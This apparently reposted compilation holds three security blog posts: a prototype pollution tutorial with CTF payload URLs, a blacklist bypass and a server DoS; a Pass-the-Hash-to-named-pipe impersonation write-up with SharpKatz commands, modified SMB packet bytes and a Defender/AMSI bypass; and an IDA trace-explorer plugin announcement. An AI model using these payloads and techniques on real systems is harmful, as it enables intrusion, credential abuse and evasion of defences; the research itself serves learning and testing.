Wappalyzer plugin There are several approaches to finding new gadgets: filedescriptor/untrusted-types.
At the time of writing, there are two versions of the plugin: main and old. We will use old because it is simpler than main. This plugin was originally developed for DOM XSS hunting; details can be found in the video Finding DOMXSS with DevTools | Untrusted Types Chrome Extension. pollute.js. How this tool works, as well as which vulnerabilities it has helped find, can be read in the article Prototype pollution - and bypassing client-side HTML sanitizers. Searching by hand, using the debugger. Let's use the first approach. Install the plugin, open the console and go to https://ctf.nikitastupin.com/pp/unknown.html. By and large, the filedescriptor/untrusted-types extension simply logs all API calls that can lead to DOM XSS. We use the filedescriptor/untrusted-types plugin to search for new gadgets In our situation, there are only two cases. Now we need to check each case manually and see whether we can use prototype pollution to change some variable and achieve XSS. The first is eval with the this argument, which we skip. In the second case, we see that the src attribute of some HTML element is assigned the value https://ctf.nikitastupin.com/pp/hello.js. Go to the stack trace, jump to loadContent @ unknown.html:17 and we see the following code. This code loads the script s. The script source is set by the scriptSource variable. The scriptSource variable, in turn, takes the already existing window.scriptSource value, or the default value "https://ctf.nikitastupin.com/pp/hello.js". This is where our gadget lies. With prototype pollution, we can define an arbitrary property on Object.prototype, which is of course part of window's prototype chain. We try to set Object.prototype.scriptSource to our own script URL; to do this, go to https://ctf.nikitastupin.com/pp/unknown.html?__proto__[scriptSource]=https://ctf.nikitastupin.com/pp/alert.js. Successful exploitation of prototype pollution with a new gadget And there it is, our alert()! We just found a new gadget for a specific site. You may say that this is an artificial example and you will not find this in the real world. However, in practice such cases do occur, because the construction var v = v || "default" is quite common in JavaScript. For example, the gadget for the leizongmin/js-xss library, which is described in the "XSS" section of the article Prototype pollution - and bypassing client-side HTML sanitizers, uses exactly this construction. Edge case In addition to the usual vectors __proto__[polluted]=1337 and __proto__.polluted=31337, I once came across a strange case. It was on one big site. Unfortunately, the report has not been disclosed yet, so no names. My private prototype pollution search plugin reported a vulnerability, but it was not possible to reproduce it using the normal vectors. I sat down to sort out what was going on. The vulnerability has already been fixed, but we have a duplicate to play with. Navigate to https://ctf.nikitastupin.com/pp/bypass.html?__proto__[polluted]=1337&__proto__.polluted=31337. Open the developer tools and check whether the vulnerability has worked. It looks like it didn't, but let's look a little deeper into the source code. The already familiar deparam function is called with the argument location.search. Let's look at the function definition. We immediately see that we are dealing with minified code, so this will be more difficult. Next, we notice the familiar strings "__proto__", "constructor" and "prototype".
Most likely, this is a blacklist of parameters, which means the developers have already tried to fix the vulnerability. But why did the plugin report a vulnerability then? Let's dig further. Reading minified source code statically is extremely difficult, so we put a breakpoint on the line h = h[a] = u < p ? h[a] || (l[u + 1] && isNaN(l[u + 1]) ? {} : []) : o. Set the breakpoint on the line shown below. Why exactly on that one? Because the plugin noticed the prototype pollution on it, so starting there seems the most logical. Reload the page and land in the debugger. Looking for a fix bypass using the debugger Now we see a construction that can lead to a vulnerability: h = {}; a = "__PROTO__"; h = h[a] = .... Why doesn't the vulnerability work? Because __PROTO__ and __proto__ are different identifiers. The next idea was to figure out exactly how the blacklist is applied and try to find a workaround. After a few hours of working with the debugger, I understood the internal logic of the function (toUpperCase() is applied to the words from the blacklist) and tried to bypass that operation, but the attempts were unsuccessful. I decided to look at the bigger picture and deal with the code that I hadn't examined yet. Of everything that could help with a bypass, only one line remained. At first glance, this line handles arrays (for example, a[0]=31&a[1]=337 is parsed into a = [31, 337]). If you look closer, ordinary values (for example, b=42) are also processed by this line. Although this code does not lead to prototype pollution directly, it does not use the blacklist, which means there is hope for a bypass! I remembered a case where prototype pollution was fixed in a similar way (blacklisting __proto__, constructor, prototype) and another researcher bypassed it and was able to change properties such as toString, ultimately causing a DoS. My first idea was to change the includes() method to return false. But then I realized that I can only add a string, and when includes is a string and we try to call it, an exception occurs (includes is not a function) and the script stops running. After that, I remembered that arrays in JavaScript are ordinary objects, and therefore array elements can be accessed through square brackets. From this came the idea that you can first put __proto__ into an array element, and then access this element through its index, thus bypassing the blacklist. Set a breakpoint on the line aaa.utils.isArray(i[a]) .... Try the payload https://ctf.nikitastupin.com/pp/bypass.html?v=1337, land in the debugger, click "Step over next function call". As a result, i[a] = o is executed; we check the value of i. What happens if you specify __proto__ instead of v? Try the payload https://ctf.nikitastupin.com/pp/bypass.html?__proto__=1337; this time i[a] = [i[a], o] is executed and we check the value of i. Whoa! The result is a very fancy object, but the most important thing is that this object will be used when parsing the following parameters! How will this help us, you may ask? The answer is literally one step away. Remove the previous breakpoint and add a breakpoint on the line h = h[a], the potentially vulnerable construct. We also add another parameter to the payload: https://ctf.nikitastupin.com/pp/bypass.html?__proto__=1337&o[k]=leet. We land in the debugger and check the value of h[0]. Suddenly, we have access to Object.prototype!
To understand why this happened, let's remember that (1) array elements in JavaScript can be accessed using square brackets, and the index can be a string, and (2) if a property is not found on the object, the search continues up the prototype chain. So it turns out that when we execute h["0"], the property "0", which is not present on the object h, is taken from the prototype h.__proto__, and its value is Object.prototype. So if we change o to 0, can we add a property to Object.prototype? Disable the breakpoints, try https://ctf.nikitastupin.com/pp/bypass.html?__proto__=1337&0[k]=leet and check the result. I think you've already figured it out for yourself. Server-side prototype pollution It all started with Olivier Arteau's talk "Prototype pollution attacks in NodeJS applications" (prototype-pollution-nsec18). Olivier discovered the prototype pollution vulnerability in several npm packages, including the hugely popular lodash package (CVE-2018-3721). The lodash package is used in many applications and packages across the JavaScript ecosystem. In particular, it is used in the popular Ghost CMS, which because of this was vulnerable to remote code execution; no authentication was required to exploit the vulnerability. Finding prototype pollution Without source code, this class of vulnerabilities is quite difficult to detect and to exploit. The exception is when you have a CVE and a ready-made payload. But let's say we have the source code. What places in the code should you pay attention to? Where is this vulnerability most common? Which language constructs are prone to it? Most often, prototype pollution is found in the following constructs / operations: recursive merging of objects (for example, jonschlinkert/merge-deep) cloning an object (for example, jonschlinkert/clone-deep) converting GET parameters to a JavaScript object (for example, AceMetrix/jquery-deparam) converting .toml or .ini configuration files to a JavaScript object (for example, npm/ini) We can trace a pattern: operations that take a complex data structure (for example, .toml) as input and convert it into a JavaScript object are the ones that tend to be vulnerable. Dynamic analysis Let's start with dynamic analysis, as it is easier to understand and apply. The algorithm is quite simple and is already implemented in find-vuln: Download the npm package. Call each function in the package with a payload as an argument. Check whether the pollution has worked. The only drawback of find-vuln.js is that it doesn't check constructor.prototype and therefore misses some of the vulnerabilities, but this gap is easy enough to close. Using a similar algorithm, I discovered CVE-2020-28460 and a vulnerability in the merge-deep package. I reported both vulnerabilities via Snyk. With the first one, everything went smoothly, but with the second one a funny situation occurred. After I sent the report, the maintainer did not get in touch for a long time, and as a result GitHub Security Lab found the same vulnerability, managed to reach the maintainer first and registered it (GHSL-2020-160). In general, with small changes to find-vuln.js you can still find vulnerabilities in npm packages even today. Static analysis This type of vulnerability is difficult to find with a simple grep, but it can be hunted very successfully with CodeQL. Existing CodeQL queries actually find prototype pollution in real packages, although at the moment not all variants of this vulnerability are covered.
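To make the "recursive merging of objects" sink listed above concrete, here is a deliberately vulnerable sketch (not the code of any specific npm package) of the kind of function the dynamic-analysis approach would flag:

// Deliberately vulnerable recursive merge: the classic server-side
// prototype pollution sink.
function merge(target, source) {
  for (const key of Object.keys(source)) {
    if (typeof source[key] === 'object' && source[key] !== null &&
        typeof target[key] === 'object' && target[key] !== null) {
      merge(target[key], source[key]); // recurses into "__proto__" too
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Attacker-controlled JSON, e.g. a request body. JSON.parse creates an own
// property literally named "__proto__", so Object.keys() returns it.
const payload = JSON.parse('{"__proto__": {"polluted": true}}');
merge({}, payload);

console.log({}.polluted); // true -> Object.prototype was polluted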
Impact Let’s say we found a library that is vulnerable to prototype pollution. How much damage can this vulnerability cause to the system? In a NodeJS environment, this is almost always a guaranteed DoS, because you can overwrite a basic function (for example, Object.prototype.toString()) and all calls to this function will return an exception. Let's look at the example of the popular expressjs/express server. Install the dependencies and start the server. And in another tab of the terminal, we send the payload. As you can see, after sending the payload, the server loses the ability to process even simple GET requests, because express internally uses Object.keys(), which we successfully turned from a function to a number. In a web application, often you can spin up to remote code execution. Normally, this is done with the template engines. The details of the operation can be found in the articles below. AST Injection, Prototype Pollution to RCE Real-world JS — 1 Prototype pollution attack in NodeJS application Mitigation There are different ways to fix this vulnerability, let’s start with the most popular option. Field black list Most often, developers simply add __proto__ to the blacklist and do not copy this field. Even experienced developers do this (for example, the npm/ini case). This fix is easily circumvented by using constructor.prototype instead of __proto__. On the one hand, this method is easy to implement and often enough to fix the vulnerability, on the other hand, it does not eliminate the problem because there is still the possibility of changing Object.prototype and other prototypes. Object.create(null) You can use an object without a prototype, then modifying the prototype will not be possible. The disadvantage is that this object can break some of the functionality further. For example, someone might want to call toString() on this object and get o.toString is not a function in response. Object.freeze() Another option is to freeze Object.prototype using the Object.freeze() function. After that, the Object. prototype cannot be modified. However, there are a few pitfalls: Dependencies that modify Object.prototype may break. In general, you will have to freeze Array.prototype and other objects. JSON schema You can validate the input data against a predefined JSON schema and discard all other parameters. For example, you can do this using the avj library with the additionalProperties = false parameter. Conclusion JavaScript prototype pollution is an extremely dangerous vulnerability, it needs to be studied more both from the point of view of finding new vectors, and from the point of view of finding new gadgets (exploitation). On the client, the vector is not developed at all when the payload is saved on the server, so there is room for further research. In addition, JavaScript has many other interesting features that can be used for new vulnerabilities, such as DEF CON Safe Mode — Feng Xiao — Discovering Hidden Properties to Attack Node js Ecosystem. Surely there are other subtleties of JavaScript that can lead to equally serious or more serious consequences for the security of applications. Acknowledgments First of all, I would like to thank Olivier, Michał Bentkowski, Sergey Bobrov, s1r1us, po6ix, William Bowling for their articles, reports and programs on the topic of prototype pollution, which they shared with everyone. Without them, the study would hardly have begun Sergey Bobrov and Mikhail Egorov for collaboration in the search of vulnerabilities. 
For proofreading, feedback and other assistance with the article, thank you to Alyona Manannikova, Anatoly Katyushin, Alexander Barabanov, Denis Makrushin and Dmitry Zheregelya. References: BlackFan/client-side-prototype-pollution / Cross-site scripting (XSS) cheat sheet / Prototype pollution - and bypassing client-side HTML sanitizers / PPScan / AST Injection, Prototype Pollution to RCE / Real-world JS - 1 / Prototype pollution attack in NodeJS application Examples: Reflected XSS on www.hackerone.com via Wistia embed code / [toolbox.teslamotors.com] HTML Injection via Prototype Pollution / Potential XSS / Discord Desktop app RCE Misc: DEF CON Safe Mode, Feng Xiao, Discovering Hidden Properties to Attack the Node.js Ecosystem Written by Nikita Stupin, Advanced Software Technology Laboratory, Huawei (https://twitter.com/_nikitastupin), for InfoSec Write-ups. Sursa: https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2
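To make the Impact and Mitigation sections of the article above concrete, here is a small self-contained sketch of the DoS effect and of the two hardening options discussed (Object.create(null) and Object.freeze()). It is illustrative only, not the exact express scenario from the article:

// Impact: polluting a basic prototype method breaks unrelated code.
const realToString = Object.prototype.toString;
Object.prototype.toString = 42;           // what a polluted merge could end up doing
try {
  ({}).toString();                        // TypeError: not a function
} catch (e) {
  console.log('DoS-style breakage:', e.message);
}
Object.prototype.toString = realToString; // restore so the rest of the sketch works

// Mitigation: an object created without a prototype has nothing to pollute.
const safe = Object.create(null);
safe['__proto__'] = { polluted: true };   // just an ordinary own property here
console.log(({}).polluted);               // undefined

// Mitigation: freeze the fundamental prototypes up front.
Object.freeze(Object.prototype);
Object.prototype.polluted = true;         // ignored here (throws in strict mode)
console.log(({}).polluted);               // still undefined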
20. Named Pipe Pass-the-Hash April 19, 2021 This post will cover a little project I did last week; it is about Named Pipe Impersonation in combination with Pass-the-Hash (PTH) to execute binaries as another user. Neither technique is new and both are often used; the only thing I did here is combine and modify existing tools. The current public tools all use PTH for network authentication only. The difference with this "new" technique is therefore that you can also spawn a new shell or C2-stager as the PTH user for local actions as well as network authentication. Introduction - why another PTH tool? I faced certain offensive security project situations in the past where I already had the NTLM hash of a low-privileged user account and needed a shell for that user on the currently compromised system - but that was not possible with the existing public tools. Imagine two more facts in a situation like that - the NTLM hash could not be cracked, and there was no process of the victim user to execute shellcode in or to migrate into. This may sound like an absurd edge case to some of you. I still experienced it multiple times. In more than one engagement I spent a lot of time searching for the right tool/technique in that specific situation. Last week, @n00py1 tweeted exactly the question I had in mind in those projects: So I thought: other people in the field obviously run into the same limitations of existing tools. My personal goals for a tool/technique were: A fully featured shell or C2 connection as the victim user account It must be able to impersonate low-privileged accounts as well - depending on the engagement goals it might be necessary to access a system as a specific user such as the CEO, HR accounts, SAP administrators or others The tool has to be usable on a fully compromised system without, for example, another Linux box under our control in the network, so that it can be used as a C2 module The tweet above therefore inspired me to search again for existing tools/techniques. There are plenty of tools for network authentication via Pass-the-Hash. Most of them have the primary goal of code execution on remote systems - which needs a privileged user's hash. Some of those are: SMB (CrackMapExec, smbexec.py, Invoke-SMBExec.ps1) WMI (Invoke-WMIExec.ps1, wmiexec.py) DCOM (dcomexec.py) WinRM (evil-winrm) If we want to have access to an administrative account and a shell for that account, we can easily use the WMI, DCOM and WinRM PTH tools, as commands are executed in the user's context. The Python tools could be executed over a SOCKS tunnel via C2, for example, and the PowerShell scripts work out of the box locally. The SMB PTH tools execute commands as nt-authority\system, so user impersonation is not possible there. One of my personal goals was not fulfilled - the impersonation of low-privileged accounts. So I had to search for more possibilities. The best options for local PTH actions are, in my opinion, Mimikatz's sekurlsa::pth and Rubeus's PTT features. I tested them again to start software via PTH or inject a Kerberos ticket into existing processes, and realized that they only provide network authentication for the PTH user. Network authentication only? Ok, I have to admit, in most cases network authentication is enough. You can read/write Active Directory via LDAP, access network shares via SMB, execute code on remote systems with a privileged user (SMB, WMI, DCOM, WinRM) and so on.
But still - the edge case of starting an application as the other user via Pass-the-Hash is not covered. I thought to myself that it might be possible to modify one of those tools to achieve the specific goal of an interactive shell. To do that, I first had to dig into the code to understand it. Modifying Rubeus was not an option for me, because PTT uses a Kerberos ticket, which as far as I know is only used for network authentication. That won't help us authenticate on localhost for a shell. So I took a look at the Mimikatz feature next. Mimikatz's sekurlsa::pth feature This part only gives some background information on the sekurlsa::pth Mimikatz module. If you already know about it, feel free to skip it. Searching for sekurlsa::pth internals turned up two good blog posts, which I recommend reading for a deeper look into the topic, as I will only explain the high-level process: https://www.praetorian.com/blog/inside-mimikatz-part1/ https://www.praetorian.com/blog/inside-mimikatz-part2/ A really short high-level overview of the process is as follows: MSV1_0 and Kerberos are two Windows authentication providers, which handle authentication using the provided credential material The LSASS process on a Windows operating system contains a structure with MSV1_0 and Kerberos credential material Mimikatz sekurlsa::pth creates a new process with a dummy password for the PTH user. The process is first created in the SUSPENDED state Afterwards it creates a new MSV and Kerberos structure with the user-provided NTLM hash and overwrites the original structure for the given user The newly created process is RESUMED, so that the specified binary, for example cmd.exe, is executed This part is copied from the part II blog: Overwriting these structures does not change the security information or user information for the local user account. The credentials stored in LSASS are associated with the logon session used for network authentication and not for identifying the local user account associated with a process. Those of you who read my other blog posts know that C/C++ is not my favorite language. Therefore I decided to work with @b4rtik's SharpKatz code, which is a C# port of the, in my opinion, most important and most used Mimikatz functions. Normally, I don't like blog posts explaining a topic with code. Don't ask me why, but this time I did it myself. The PTH module first creates a structure for the credential material called data from the class SEKURLSA_PTH_DATA: The NtlmHash field of this new structure is filled with our given hash:
if (!string.IsNullOrEmpty(rc4)) ntlmHashbytes = Utility.StringToByteArray(rc4);
if (!string.IsNullOrEmpty(ntlmHash)) ntlmHashbytes = Utility.StringToByteArray(ntlmHash);
if (ntlmHashbytes.Length != Msv1.LM_NTLM_HASH_LENGTH) throw new System.ArgumentException();
data.NtlmHash = ntlmHashbytes;
A new process in the SUSPENDED state is opened. Note that our PTH username is passed with an empty password:
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
if(CreateProcessWithLogonW(user, "", domain, @"C:\Windows\System32\", binary, arguments, CreationFlags.CREATE_SUSPENDED, ref pi))
In the next step, the process is opened and the LogonID of the new process is copied into our credential material object, which is tied to our PTH username. Afterwards, the function Pth_luid is called.
This function first searches for and then overwrites the MSV1.0 and Kerberos credential material with our newly created structure: If that succeeds, the process is resumed via NtResumeProcess. Named Pipe Impersonation Thinking about alternative ways to impersonate the PTH user, I asked @EthicalChaos about my approach/ideas and the use case. Brainstorming with you is always a pleasure, thanks for that! Some ideas for the use case were: NTLM challenge response locally via InitializeSecurityContext / AcceptSecurityContext Impersonation via process token Impersonation via named pipe identity Impersonation via RPC identity I excluded the first one, because I simply had no idea about it and had never worked with it before. Impersonation via process token or RPC identity requires an existing process of the target user to steal the token from. A process for the target user doesn't exist in my scenario, so only Named Pipe Impersonation was left. And I thought: cool, I have already worked with that to build a script to get a SYSTEM shell - NamedPipeSystem.ps1. So I'm not completely lost in the topic and know what it is about. For everyone out there who doesn't know about Named Pipe Impersonation, I can recommend the following blog post by @decoder_it: https://decoder.cloud/2019/03/06/windows-named-pipes-impersonation/ Again, a short high-level overview. Named Pipes are meant to be used for asynchronous or synchronous communication between processes. It's possible to send or receive data via Named Pipes locally or over the network. Named Pipes on a Windows operating system are accessible over the IPC$ network share. One Windows API call, namely ImpersonateNamedPipeClient(), allows the server to impersonate any client connecting to it. The only thing you need for that is the SeImpersonatePrivilege privilege. Local administrators and many service accounts have this privilege by default. So opening up a Named Pipe with this privilege enables us to impersonate any user connecting to that Pipe via ImpersonateNamedPipeClient() and open a new process with the token of that user account. My first thought about Named Pipe Impersonation in combination with PTH was that I could spawn a new cmd.exe process via Mimikatz or SharpKatz Pass-the-Hash and connect to the Named Pipe over IPC$ in the new process. If the network credentials are used for that, we would be able to fulfill all our goals for a new tool. So I opened up a new Powershell process via PTH and SharpKatz with the following command: .\SharpKatz.exe --Command pth --User testing --Domain iPad --NtlmHash 7C53CFA5EA7D0F9B3B968AA0FB51A3F5 --Binary "\WindowsPowerShell\v1.0\powershell.exe" What happens in the background? That is explained above. To test that we are really using the credentials of the user testing, we can connect to a Linux box's SMB server: smbserver.py -ip 192.168.126.131 -smb2support testshare /mnt/share After opening up the server we can connect to it by simply echoing into the share: And voila, the authentication as testing came in, so this definitely works: @decoder_it wrote a PowerShell script - pipeserverimpersonate.ps1 - which lets us easily open up a Named Pipe server for user impersonation and open cmd.exe afterwards with the token of the connecting user. The next step for me was to test whether connections from this new process reach the Named Pipe server with the network credentials.
It turned out that this unfortunately is not the case: I tried to access the Pipe via 127.0.0.1, the hostname and the external IP, but got the same result in every case: I also tried using a NamedPipeClient via PowerShell - maybe this would result in network authentication as the user testing - still no success: At this point I had no clue how I could trigger network authentication to localhost for the Named Pipe access. So I gave up on Mimikatz and SharpKatz - but still learned something by doing that. And maybe some of you also learned something in this section. This was a dead end for me. But what exactly happens when network authentication is triggered? To check that, I monitored the network interface for SMB access from one Windows system to another: The TCP/IP three-way handshake is done (SYN, SYN/ACK, ACK) Two Negotiate Protocol Requests and Responses Session Setup Request, NTLMSSP_NEGOTIATE + NTLMSSP_AUTH Tree Connect Request to IPC$ Create Request File testpipe During my tool research I took a look at @kevin_robertson's Invoke-SMBExec.ps1 code and found that this script builds exactly the same packets and sends them manually. So by modifying this script, it could be possible to skip the Windows default behaviour and just send exactly those packets ourselves. This would simulate a remote system authenticating to our Pipe as the user testing. I went through the SMB documentation for some hours, but that did not help me much, to be honest. But then I had the idea to just monitor the default Invoke-SMBExec.ps1 traffic for the testing user. Here is the result: Comparing those two packet captures reveals only one very small difference. Invoke-SMBExec.ps1 tries to access the Named Pipe svcctl. We can easily change that in lines 1562 and 2248 for the CreateRequest and CreateAndXRequest stages, by using different hex values for another Pipe name. So if we only change those bytes to the following, a CreateRequest is sent to our attacker-controlled Named Pipe: $SMB_named_pipe_bytes = 0x74,0x00,0x65,0x00,0x73,0x00,0x74,0x00,0x70,0x00,0x69,0x00,0x70,0x00,0x65,0x00 # \testpipe The result is a local authentication to the Named Pipe as the user testing: To get rid of the error message and the resulting timeout, we have to make some further changes to the Invoke-SMBExec code. I therefore modified the script so that after the CreateRequest a CloseRequest, TreeDisconnect and Logoff packet is sent instead of the default code-execution logic for service creation and so on. I also removed all the Inveigh session stuff, parameters and so on. But there was still one more thing to fix. I got the following error from cmd.exe when impersonating the user testing via network authentication: This error didn't pop up when a cmd.exe was opened with the password and accessed the Pipe afterwards. Googling this error turns up many crap answers, ranging from "corrupted filesystem, try to repair it" to "install DirectX 11" or "disable antivirus". I decided to ask the community via Twitter and got a fast response from @tiraniddo that the error code is likely due to not being able to open the Window Station. A solution for that is changing the WinSta/Desktop DACL to grant everyone access. I would never have figured this out, so thank you for that! @decoder_it also sent a link to RoguePotato; the code for setting correct WinSta/Desktop permissions is included there.
Modifying RoguePotato & building one script as PoC Taking a look at the Desktop.cpp code from RoguePotato, I decided pretty fast that porting this code to PowerShell or C# was not a good idea for me, as it would take way too much time. So my idea was to modify the RoguePotato code to get a PipeServer which sets correct permissions for WinSta/Desktop. Doing this was straightforward as I mostly had to remove code. So I removed the RogueOxidResolver components, the IStorageTrigger and so on. The result is the PipeServerImpersonate code. Testing the server in combination with our modified Invoke-SMBExec script resulted in no shell at first. The CreateProcessAsUserW function did not open the desired binary even though the token had SE_ASSIGN_PRIMARY_NAME privileges. I ended up using CreateProcessWithTokenW with CREATE_NEW_CONSOLE as dwCreationFlags, which worked perfectly fine. Opening up the Named Pipe via the modified RoguePotato and connecting to it via Invoke-NamedPipePTH.ps1 resulted in a successful Pass-the-Hash to a Named Pipe for impersonation and binary execution with the new token: Still - this is not a perfect solution. Dropping PipeServerImpersonate to disk and executing the script in another session is one option, but a single script doing everything is much better in my opinion. Therefore I built a single script which leverages Invoke-ReflectivePEInjection.ps1 to execute PipeServerImpersonate from memory. This is done in the background via Start-Job, so that Invoke-NamedPipePTH can connect to the Pipe afterwards. It's possible to specify a custom Pipe name and a binary for execution: This enables us to use it from a C2 server as a module. You could also specify a C2-stager as the binary, so that you get a new agent with the credentials of the PTH user. Further ideas & improvements I still see my code as a PoC, because it is far away from being OPSEC safe and I didn't test that many possible use cases. Using syscalls for PipeServerImpersonate and PE injection instead of Windows API functions would further improve this, for example. For those of you looking for a C# solution: Sharp-SMBExec is a C# port of Invoke-SMBExec which can be modified the same way I did here to get a C# version of the PTH-to-Named-Pipe part. However, the PipeServerImpersonate part would also have to be ported, which in my opinion is more work to do. The whole project gave me the idea that it would be really cool to also add an option to impacket's ntlmrelayx.py to relay connections to a Named Pipe. Imagine you compromised a single host in a customer environment and this single host didn't give up any valuable credentials but has SMB signing disabled. Modifying PipeServerImpersonate so that the Named Pipe is not closed but re-opened after executing a binary would make it possible to get a C2-stager for every single incoming NetNTLMv2 connection. This means raining shells. The connections only need to be relayed to \\targetserver\IPC$\pipename to get a shell or C2 connection. Conclusion This is the first time that I have created something like a new technique. At least I didn't see anyone else using a combination of PTH and Named Pipe Impersonation with the same goal. For me, this was a pretty exciting experience and I learned a lot again. I hope that you also learned something from it, or can at least use the resulting tool in engagements whenever you are stuck in a situation like the one described above. The script/tool is released with this post, and feedback is as always very welcome!
https://github.com/S3cur3Th1sSh1t/NamedPipePTH 20.04.2021: Update I'm pretty sure that, before publication of the tool, I tested the content of Start-Job script blocks for AMSI scans/blocks, and it was neither scanned nor blocked. After the publication, Microsoft obviously decided to activate this feature, because the standalone script didn't work anymore with Defender enabled, even after patching AMSI.dll in memory for the process: Therefore, I decided to switch from the native Start-Job function to the Start-ThreadJob function, which again bypasses Defender because it's executed in the same process: If this description is true, Start-Job should have scanned and blocked scripts before, because it's another process. But here we stay in the same process, so the bypass works: Links & Resources Crackmapexec - https://github.com/byt3bl33d3r/CrackMapExec Impacket - https://github.com/SecureAuthCorp/impacket/ Invoke-TheHash - https://github.com/Kevin-Robertson/Invoke-TheHash/ evil-winrm - https://github.com/Hackplayers/evil-winrm mimikatz - https://github.com/gentilkiwi/mimikatz Rubeus - https://github.com/GhostPack/Rubeus Inside Mimikatz part I - https://www.praetorian.com/blog/inside-mimikatz-part1/ Inside Mimikatz part II - https://www.praetorian.com/blog/inside-mimikatz-part2/ SharpKatz - https://github.com/b4rtik/SharpKatz/ NamedPipeSystem - https://github.com/S3cur3Th1sSh1t/Get-System-Techniques/blob/master/NamedPipe/NamedPipeSystem.ps1 Windows Named Pipes Impersonation - https://decoder.cloud/2019/03/06/windows-named-pipes-impersonation/ PipeServerImpersonate.ps1 - https://github.com/decoder-it/pipeserverimpersonate/blob/master/pipeserverimpersonate.ps1 SMB Documentation - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/5606ad47-5ee0-437a-817e-70c366052962 RoguePotato - https://github.com/antonioCoco/RoguePotato Invoke-ReflectivePEInjection - https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1 Sharp-SMBExec - https://github.com/checkymander/Sharp-SMBExec NamedPipePTH - https://github.com/S3cur3Th1sSh1t/NamedPipePTH PSThreadJob - https://github.com/PaulHigin/PSThreadJob Sursa: https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/
  21. Tenet: A Trace Explorer for Reverse Engineers Conventional Debuggers Are Crumbling to Software Complexity, Now What? April 20, 2021 / Markus Gaasedelen Debugging is traditionally a tedious, monotonous endeavor. While some people love the archaeological process of using a debugger to uncover software defects or perform tasks in software reverse engineering, virtually everyone agrees that the tools have started to show their age against modern software. Our methods of runtime introspection are still hyper-focused on individual states of execution. This is a problem because software has grown dramatically more complex, requiring more context and ‘situational awareness’ to properly interpret. The emergence of timeless debugging has alleviated some of these growing pains, but these solutions are still built around conventional methods of inspecting individual states rather than how they relate to one another. I am open sourcing Tenet, an IDA Pro plugin for exploring execution traces. The goal of this plugin is to provide more natural, human controls for navigating execution traces against a given binary. The basis of this work stems from the desire to research new or innovative methods to examine and distill complex execution patterns in software. Tenet is an experimental plugin for exploring software execution traces in IDA Pro Background Tenet is directly inspired by QIRA. The earliest prototypes I wrote for this date back to 2015 when I was working as a software security engineer at Microsoft. These prototypes were built on top of the private ‘trace reader’ APIs for TTD, previously known as TTT, or iDNA. I abandoned that work because I wasn’t convinced an assembly level trace explorer would make sense at the one company in the world where Windows is called ‘open source software’. I’m revisiting the idea of a trace explorer because it’s 2021 and the space is still wildly undeveloped. Among other ideas, I firmly believe in the notion that there is a geographical landscape to program execution, and that the principles of traditional cartography can be applied to the summarization, illustration, and navigation of these landscapes. As cool as I hope you find the plugin, Tenet is only a stepping stone to further research these ideas. Usage Tenet can be downloaded or cloned from GitHub. It requires IDA 7.5 and Python 3. Once properly installed, there will be a new menu entry available in the disassembler. This can be used to load externally-collected execution traces into Tenet. Tenet adds a menu entry to the IDA --> Load file submenu to load execution traces As this is the initial release, Tenet only accepts simple human-readable text traces. Please refer to the tracing readme for additional information on the trace format, limitations, and reference tracers. Bidirectional Exploration While using Tenet, the plugin will ‘paint’ trails to indicate the flow of execution forwards (blue) and backwards (red) from your present position in the active execution trace. Tenet provides locality to past and present execution flow while navigating the trace To step forwards or backwards through time, you simply scroll while hovering over the timeline on the right side of the disassembler. To step over function calls, hold SHIFT while scrolling. Trace Timeline The trace timeline will be docked on the right side of the disassembler. This widget is used to visualize different types of events along the trace timeline and perform basic navigation as described above. 
The trace timeline is a key component to navigating Tenet traces and focusing on areas of interest

By clicking and dragging across the timeline, it is possible to zoom in on a specific section of the execution trace. This action can be repeated any number of times to reach the desired granularity.

Execution Breakpoints

Clicking the instruction pointer in the registers window will highlight it in red, revealing all the locations the instruction was executed across the trace timeline.

Placing a breakpoint on the current instruction and navigating between its executions by scrolling

To jump between executions, scroll up or down while hovering the highlighted instruction pointer. Additionally, you can right click in the disassembly listing and select one of the navigation-based menu entries to quickly seek to the execution of an instruction of interest.

Using a Tenet navigation shortcut to seek the trace to the first execution of the given instruction

IDA's native F2 hotkey can also be used to set breakpoints on arbitrary instructions.

Memory Breakpoints

By clicking a byte in either the stack or memory views, you will instantly see all reads/writes to that address visualized across the trace timeline. Yellow indicates a memory read, blue indicates a memory write.

Seeking the trace across states of execution, based on accesses to a selected byte of memory

Memory breakpoints can be navigated using the same technique described for execution breakpoints. Click a byte, and scroll while hovering the selected byte to seek the trace to each of its accesses. Right clicking a byte of interest will give you options to seek between memory read / write / access if there is a specific navigation action that you have in mind.

Tenet provides a number of navigation shortcuts for memory accesses

To navigate the memory view to an arbitrary address, click onto the memory view and hit G to enter either an address or database symbol to seek the view to.

Region Breakpoints

A rather experimental feature is setting access breakpoints for a region of memory. This is possible by highlighting a block of memory and selecting the Find accesses action from the right click menu.

Tenet allows you to set a memory access breakpoint over a region of memory, and navigate between its accesses

As with normal memory breakpoints, hovering the region and scrolling can be used to traverse between the accesses made to the selected region of memory.

Register Seeking

In reverse engineering, it's pretty common to encounter situations where you ask yourself "Which instruction set this register to its current value?" Using Tenet, you can seek backwards to that instruction in a single click.

Seeking to the timestamp responsible for setting a register of interest

Seeking backwards is by far the most common direction to navigate across register changes, but for dexterity you can also seek forward to the next register assignment using the blue arrow on the right of the register.

Timestamp Shell

A simple 'shell' is provided to navigate to specific timestamps in the trace. Pasting (or typing…) a timestamp into the shell, with or without commas, will suffice.

The 'timestamp shell' can be used to navigate the trace reader to a specific timestamp

Using an exclamation point, you can also seek a specified 'percentage' into the trace. Entering !100 will seek to the final instruction in the trace, while !50 will seek approximately 50% of the way through the trace.

Themes

Tenet ships with two default themes: a 'light' theme and a 'dark' one.
Depending on the colors currently used by your disassembler, Tenet will attempt to select the theme that seems most appropriate.

Tenet has both light and dark themes that will be selected based on the user's disassembly theme

The theme files are stored as simple JSON on disk and are highly configurable. If you are not happy with the default themes or colors, you can create your own themes and simply drop them in the user theme directory. Tenet will remember your theme preference for future loads and uses.

Open Source

Tenet is currently an unfunded research project. It is available for free on GitHub, published under the MIT license. In the public README, there is additional information on how to get started, future ideas, and even an FAQ that is not covered in this post.

